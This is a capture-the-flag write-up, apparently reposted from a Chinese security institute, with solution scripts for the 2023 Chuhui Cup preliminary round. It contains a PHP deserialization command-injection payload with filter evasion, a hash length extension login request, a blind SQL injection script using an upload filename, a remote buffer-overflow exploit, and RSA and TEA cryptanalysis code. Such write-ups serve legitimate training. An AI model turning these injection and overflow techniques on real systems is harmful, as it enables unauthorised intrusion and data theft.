web
eaaeval
www.zip 获取了源码,使用以下exp来生成payload即可读取flag
<?php
class Flag{
public $a;
public $b;
public function __construct(){
$this->a = 'nl';
$this->b = '/fl*';
}
public function __destruct(){
if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){
system($this->a.' '.$this->b);
}else{
echo "again?";
}
}
}
echo serialize(new Flag());
upload_shell
hash长度扩展攻击
import requests
url = "http://80.endpoint-8e6483aadb164b4c8a6350dd2a42df47.m.ins.cloud.dasctf.com:81/login.php"
def login():
payload = "password%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D8%00%00%00%00%00%00%001"
data = {"username": "admin","password": payload}
print(requests.post(url,data,cookies={"source": "1e89ee6ac8774ffe0a6ea5e6ff13e6ae"}).headers)
login()
获取到session后编写sql注入脚本
import requests as requests
url = "http://80.endpoint-8e6483aadb164b4c8a6350dd2a42df47.m.ins.cloud.dasctf.com:81/upload.php"
def sqli(data):
fh = requests.post(url, files={"file": (f"' or exp(709+({data}))-- ","")},cookies={"PHPSESSID": "0f9ad87a7e22457cf0bba51ed47d54b4"}).text
# print(fh)
if "Warning" in fh:
return True
return False
# 注入点,返回条件是否成立
def sqli1(sql):
ans = ''
for i in range(26, 1000):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
sqlitest = sqli("(ascii(substr((%s),%d,1))<%d)" % (sql,i, mid))
if sqlitest:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print(ans)
# 二分法注入
# sqli1('123')
# sqli1('select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA')
# sqli1("select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA='perf'")
# sqli1("select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='TheFl4g'")
sqli1("select flag from flag")
PWN
ez_base
from pwn import *
import base64
context.log_level = 'debug'
#libc=ELF('./libc.so.6')
#p = process('./base')
p=remote('tcp.cloud.dasctf.com',28703)
#attach(p,'b *0x404A9Fnb *0x404B15')
p.recvuntil(':decode')
p.sendline('2')
p.recvuntil('_str:')
pay='a'*0x28+p64(0x040490D)
b = base64.b64encode(pay.encode('utf-8'))
p.sendline(b)
p.interactive()
Crypto
so-large-e
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
def get_ne():
# 读取PEM格式的RSA公钥文件
with open('pub.pem', 'rb') as key_file:
public_key = serialization.load_pem_public_key(
key_file.read(),
backend=default_backend()
)
# 提取公钥的n和e值
n_value = public_key.public_numbers().n
e_value = public_key.public_numbers().e
print(f'n: {hex(n_value)}')
print(f'e: {hex(e_value)}')
N= 0xa5ed986d5c338815d4a79de8ed3a7d9639d72acb3aef28c5454c8a92c8f5774e48f99bd11373fae5bcb24b710bc8d15eadafebb94eafb3a96050cecbd1b2f2adf9aa74256f2ea74a83d67188bdc25576c5808ddb1eec01ff377fb183c36b1f79ced0e216ccca64187fb84d5b0e06ef0c9e19d1f52c53903a7e814b47b4f47f6b
e= 0xa18e9d8f15fa4257886b5723c9aca3f68076d6fa8ee604d89477702f51c6e4afbac0e928f7b54df7c86288a176e6642e2b58d72eaabb2808fbc8165fd81d83ca5433a5d8f94b683562fd0e44ca61a451f3d7a19b12731be466d90eb7d5d8e3058478332dc45fecc275749e10144891076a614bde2d0f0167fdb8175d561787e1
c = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
from Crypto.Util.number import *
"""
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
"""
debug = False
"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
"""
strict = False
"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
"""
helpful_only = True
dimension_min = 7 # stop removing if lattice reaches that dimension
############################################
# Functions
##########################################
# display stats on helpful vectors
def helpful_vectors(BB, modulus):
nothelpful = 0
for ii in range(BB.dimensions()[0]):
if BB[ii, ii] >= modulus:
nothelpful += 1
print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")
# display matrix picture with 0 and X
def matrix_overview(BB, bound):
for ii in range(BB.dimensions()[0]):
a = ('%02d ' % ii)
for jj in range(BB.dimensions()[1]):
a += '0' if BB[ii, jj] == 0 else 'X'
if BB.dimensions()[0] < 60:
a += ' '
if BB[ii, ii] >= bound:
a += '~'
print(a)
# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):
# end of our recursive function
if current == -1 or BB.dimensions()[0] <= dimension_min:
return BB
# we start by checking from the end
for ii in range(current, -1, -1):
# if it is unhelpful:
if BB[ii, ii] >= bound:
affected_vectors = 0
affected_vector_index = 0
# let's check if it affects other vectors
for jj in range(ii + 1, BB.dimensions()[0]):
# if another vector is affected:
# we increase the count
if BB[jj, ii] != 0:
affected_vectors += 1
affected_vector_index = jj
# level:0
# if no other vectors end up affected
# we remove it
if affected_vectors == 0:
# print("* removing unhelpful vector", ii)
BB = BB.delete_columns([ii])
BB = BB.delete_rows([ii])
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# level:1
# if just one was affected we check
# if it is affecting someone else
elif affected_vectors == 1:
affected_deeper = True
for kk in range(affected_vector_index + 1, BB.dimensions()[0]):
# if it is affecting even one vector
# we give up on this one
if BB[kk, affected_vector_index] != 0:
affected_deeper = False
# remove both it if no other vector was affected and
# this helpful vector is not helpful enough
# compared to our unhelpful one
if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(
bound - BB[ii, ii]):
# print("* removing unhelpful vectors", ii, "and", affected_vector_index)
BB = BB.delete_columns([affected_vector_index, ii])
BB = BB.delete_rows([affected_vector_index, ii])
monomials.pop(affected_vector_index)
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# nothing happened
return BB
"""
Returns:
* 0,0 if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""
def boneh_durfee(pol, modulus, mm, tt, XX, YY):
"""
Boneh and Durfee revisited by Herrmann and May
finds a solution if:
* d < N^delta
* |x| < e^delta
* |y| < e^0.5
whenever delta < 1 - sqrt(2)/2 ~ 0.292
"""
# substitution (Herrman and May)
PR.<u,x,y> = PolynomialRing(ZZ)
Q = PR.quotient(x * y + 1 - u) # u = xy + 1
polZ = Q(pol).lift()
UU = XX * YY + 1
# x-shifts
gg = []
for kk in range(mm + 1):
for ii in range(mm - kk + 1):
xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kk
gg.append(xshift)
gg.sort()
# x-shifts list of monomials
monomials = []
for polynomial in gg:
for monomial in polynomial.monomials():
if monomial not in monomials:
monomials.append(monomial)
monomials.sort()
# y-shifts (selected by Herrman and May)
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)
yshift = Q(yshift).lift()
gg.append(yshift) # substitution
# y-shifts list of monomials
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
monomials.append(u ^ kk * y ^ jj)
# construct lattice B
nn = len(monomials)
BB = Matrix(ZZ, nn)
for ii in range(nn):
BB[ii, 0] = gg[ii](0, 0, 0)
for jj in range(1, ii + 1):
if monomials[jj] in gg[ii].monomials():
BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)
# Prototype to reduce the lattice
if helpful_only:
# automatically remove
BB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)
# reset dimension
nn = BB.dimensions()[0]
if nn == 0:
print("failure")
return 0, 0
# check if vectors are helpful
if debug:
helpful_vectors(BB, modulus ^ mm)
# check if determinant is correctly bounded
det = BB.det()
bound = modulus ^ (mm * nn)
if det >= bound:
# print("We do not have det < bound. Solutions might not be found.")
# print("Try with highers m and t.")
if debug:
diff = (log(det) - log(bound)) / log(2)
# print("size det(L) - size e^(m*n) = ", floor(diff))
if strict:
return -1, -1
else:
print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")
# display the lattice basis
if debug:
matrix_overview(BB, modulus ^ mm)
# LLL
if debug:
print("optimizing basis of the lattice via LLL, this can take a long time")
BB = BB.LLL()
if debug:
print("LLL is done!")
# transform vector i & j -> polynomials 1 & 2
if debug:
print("looking for independent vectors in the lattice")
found_polynomials = False
for pol1_idx in range(nn - 1):
for pol2_idx in range(pol1_idx + 1, nn):
# for i and j, create the two polynomials
PR.<w,z> = PolynomialRing(ZZ)
pol1 = pol2 = 0
for jj in range(nn):
pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)
# resultant
PR.<q> = PolynomialRing(ZZ)
rr = pol1.resultant(pol2)
# are these good polynomials?
if rr.is_zero() or rr.monomials() == [1]:
continue
else:
# print("found them, using vectors", pol1_idx, "and", pol2_idx)
found_polynomials = True
break
if found_polynomials:
break
if not found_polynomials:
# print("no independant vectors could be found. This should very rarely happen...")
return 0, 0
rr = rr(q, q)
# solutions
soly = rr.roots()
if len(soly) == 0:
# print("Your prediction (delta) is too small")
return 0, 0
soly = soly[0][0]
ss = pol1(q, soly)
solx = ss.roots()[0][0]
#
return solx, soly
delta = .271 # this means that d < N^delta
m = 8 # size of the lattice (bigger the better/slower)
t = int((1 - 2 * delta) * m) # optimization from Herrmann and May
X = 2 * floor(N ^ delta) # this _might_ be too much
Y = floor(N ^ (1 / 2)) # correct if p, q are ~ same size
P.<x,y> = PolynomialRing(ZZ)
A = int((N + 1) / 2)
pol = 1 + x * (A + y)
solx, soly = boneh_durfee(pol, e, m, t, X, Y)
d = int(pol(solx, soly) / e)
print(d)
d = 663822343397699728953336968317794118491145998032244266550694156830036498673227937
N = 0xa5ed986d5c338815d4a79de8ed3a7d9639d72acb3aef28c5454c8a92c8f5774e48f99bd11373fae5bcb24b710bc8d15eadafebb94eafb3a96050cecbd1b2f2adf9aa74256f2ea74a83d67188bdc25576c5808ddb1eec01ff377fb183c36b1f79ced0e216ccca64187fb84d5b0e06ef0c9e19d1f52c53903a7e814b47b4f47f6b
e = 0xa18e9d8f15fa4257886b5723c9aca3f68076d6fa8ee604d89477702f51c6e4afbac0e928f7b54df7c86288a176e6642e2b58d72eaabb2808fbc8165fd81d83ca5433a5d8f94b683562fd0e44ca61a451f3d7a19b12731be466d90eb7d5d8e3058478332dc45fecc275749e10144891076a614bde2d0f0167fdb8175d561787e1
c = 6838759631922176040297411386959306230064807618456930982742841698524622016849807235726065272136043603027166249075560058232683230155346614429566511309977857815138004298815137913729662337535371277019856193898546849896085411001528569293727010020290576888205244471943227253000727727343731590226737192613447347860
from Crypto.Util.number import *
print(long_to_bytes(pow(c,d,N)))
Matrixequation
2021 Crypto CTF的Onlude原题:https://github.com/killua4564/2021-Crypto-CTF/tree/master/Onlude
import re
import string
alphabet = string.printable[:71]
p = len(alphabet)
with open('./output', 'r') as f:
data = f.read().split('n')[:-1]
data = [re.findall(r'd+', d) for d in data]
data = [[Integer(di) for di in d] for d in data]
n = 11
E = matrix(GF(p), data[:11])
LUL = matrix(GF(p), data[11: 22])
ULUL = matrix(GF(p), data[22: 33])
RiLU8 = matrix(GF(p), data[33: 44])
Ui = LUL * ULUL^(-1)
Ri = RiLU8 * Ui * (ULUL^(-1))^3 * LUL^(-1)
U = Ui^(-1)
assert Ri * (LUL * U)^4 == RiLU8
R = Ri^(-1)
AR = Ui * E
A = AR - R
print(A)
flag = ''
for k in range(24):
i, j = 5*k // 11, 5*k % 11
flag += alphabet[A[i, j]]
print(flag)
from hashlib import md5
finalflag = 'DASCTF{' + f'{md5(flag.encode()).hexdigest()}' + '}'
print(finalflag)
# DASCTF{3529d01631d8436edca1c78ad82b6f26}
Reverse
Babyre
插件识别出了 TEA
已经识别出算法,网上有很多写 TEA 的脚本
#include <iostream>
#include <stdio.h>
#include <stdint.h>
void jm(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4])
{
unsigned int i;
uint32_t v0 = v[0], v1 = v[1], sum = 0, delta = 0x61C88647;
for (i = 0; i < num_rounds; i++)
{
v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
sum -= delta;
v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
}
v[0] = v0;
v[1] = v1;
}
void dm(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4])
{
unsigned int i;
uint32_t v0 = v[0], v1 = v[1], delta = 0x61C88647, sum = 0xc6ef3720;
for (i = 0; i < num_rounds; i++)
{
v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
sum += delta;
v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
}
v[0] = v0;
v[1] = v1;
}
int main()
{
uint32_t enc[] = { 0x168f8672, 0x2dbd824, 0xcf647fca, 0xe6efa7ef, 0x4ae016f0, 0xc5832e1d, 0x455c0a05, 0xffeb8140, 0xbe9561ef, 0x7f819e23, 0x3bc04269, 0xc68b825b, 0xe6a5b1f0, 0xbd03cbbd, 0xa9b3ce0e, 0x6c85e6e7, 0x9f5c71ef, 0x3be4bd57 };
uint32_t key[4] = { 0xDEADBEEF, 0x87654321, 0xFACEB00C, 0xCAFEBABE };
unsigned int r = 32;
int n = sizeof(enc) / sizeof(uint32_t);
for (int i = 0; i < n / 2; i++)
{
dm(r, &enc[i * 2], key);
printf("%s", &enc[i * 2]);
}
return 0;
}
原文始发于微信公众号(山石网科安全技术研究院):2023首届“楚慧杯”初赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论